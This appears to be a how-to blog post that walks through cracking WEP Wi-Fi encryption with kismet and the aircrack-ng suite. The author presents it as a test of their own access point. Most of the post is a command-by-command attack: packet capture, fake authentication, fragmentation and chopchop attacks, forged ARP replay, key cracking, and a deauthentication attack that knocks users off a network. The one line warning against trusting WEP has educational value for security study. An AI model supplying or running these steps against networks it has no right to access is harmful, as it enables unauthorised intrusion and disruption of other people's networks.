I have cracked WEP from my own AP, I found amazing how easy it can be done.
So DO NOT TRUST in just WEP.Using kismet and aircrack-ng I was able to crack in less then 20min.
p.s. For those lammers that still use windows I sugest using this top of the line Live CD called BackTrack http://www.remote-exploit.org/backtrack_download.html
Another ways are out there to crack it, I would also recommend a less manual method by using de Live-CD called Wifiway, download or just use the one bellow plus the script called airoway, download
#apt-get install kismet
Start Kismet, you will need your wifi dirver
#lshw -C network
#dmesg| grep ipw
#dmesg| grep wl
To find more info on your Driver
#sudo lsmod | grep iwl4965
#kismet -c rt2500,rausb0,wifi
#kismet -c iwl4965,wlan0,Wifi
(if it dosent work)
The problem of this drivers with kismet is that you can’t put your card in “monitor mode”.
#iwconfig wlan0 mode monitor
Once you have the GUI, type H for help or “S” then “p” to sort by Packet Count,
now scroll and hit “I” for more info on the one you wish. Take note of Channel, BSSID, SSID,
shift-L to lock where you want then follow instructions bellow.
Save your configuration,
#gedit /etc/kismet/kismet.conf and enter in the line 27:
Install aircrack-ng tools
#apt-get install aircrack-ng
Dump IVS, –ivs -w (will write only IVS traffic to file capB) pass channel and Bssid as args.
#airodump-ng rausb0 –ivs -w WLAN_1A -a –channel 06 –bssid 00:01:38:6D:2E:26
Open another terminal and start to authenticate.
1- Authenticating With AP, will SPPED UP, Generating IVS
# aireplay-ng -1 5 -o 1 -q 10 -e “WLAN_1A” -a 00:01:38:6D:2E:26 -h 00:12:17:88:50:A9 rausb0
2.Geting XOR packet to replay
A- Fragmentation attack
# aireplay-ng -5 -b 00:01:38:6D:2E:26 -h 00:12:17:88:50:A9 rausb0
B- chopchop attack
# aireplay-ng -4 -b 00:19:5B:9C:68:FA -h 00:12:17:88:50:A9 rausb0
Generated .xor and .cap files
3.Create ARP Request Packer
# packetforge-ng -0 -a 00:01:38:6D:2E:26 -h 00:12:17:88:50:a9 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0821-224752.xor -w arp-request
Once authenticate is Ok and you have the packet, in another terminal do:
4-Replay ARP Traffic (Note IVS increase!)
# aireplay-ng -2 -x 45 -r arp-request rausb0
Once you get about 20.000 (on #DATA) you can start trying but usually with aroung 40-60k it should crack it
5-Cracking WEP while DUmping
# aircrack-ng -f 2 -b 00:C0:A8:B4:97:ED -n 64 capA-03.ivs
# aircrack-ng -z -b 00:01:38:87:E8:79 D*.cap
Deauth Attack, You can Deauthanticate people from the AP (same time should have airodump)
# aireplay-ng –deauth 1 -a 00:16:38:C4:9F:AD -c 01:80:C2:00:00:00 rausb0
Tags: aircrack-ng, hack wep, kismet, security, wep crack
Posted in HowTo, Linux | No Comments »